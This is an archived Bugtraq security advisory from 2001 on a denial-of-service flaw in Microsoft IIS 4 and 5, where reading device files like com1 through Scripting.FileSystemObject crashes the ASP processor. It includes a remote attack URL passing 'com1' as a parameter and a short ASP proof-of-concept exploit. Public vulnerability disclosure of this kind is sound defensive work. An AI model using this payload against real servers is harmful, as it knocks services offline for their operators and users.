Bugtraq mailing list archives

NERF Advisory #4: MS IIS local and remote DoS

From: VIPER_SV /nerf/team/ <hax () r dot>
Date: Wed, 4 Jul 2001 23:35:27 +0700

                              --== NERF gr0up security advisory #4 ==--  
                                  MS IIS local and remote DoS      

1. Vulnerable soft: IIS 4,5   

2. Description:
Openning and reading of device files (com1, com2, etc.) using Scripting.FileSystemObject will crash ASP-processor 
(asp.dll).
 
3. Local exploit:
If you have permission on creating .asp-file, you can crash ASP-processor.
 
4. Remote exploit:
Sometimes filename passing as asp-script param, which open and read data from file. Passing param as device file will
crash asp-processor.
http://host.int/scripts/script.asp?script=com1
 
5. Solution:
Fix Scripting.FileSystemObject (have to check file for existing before openning.
 
6. ASP-Exploit:
 
<%
  Dim strFileName, objFSO, objFile
 
  Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
 
  strFileName = "com1"
 
  Set objFile = objFSO.OpenTextFile(strFileName)
 
  Response.Write objFile.ReadAll
 
  objFile.Close

%>
 
7.Sorry:
for poor english
---------------------------------------------------
Found by buggzy (buggzy () nerf ru)
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)

Current thread:

NERF Advisory #4: MS IIS local and remote DoS VIPER_SV /nerf/team/ (Jul 04)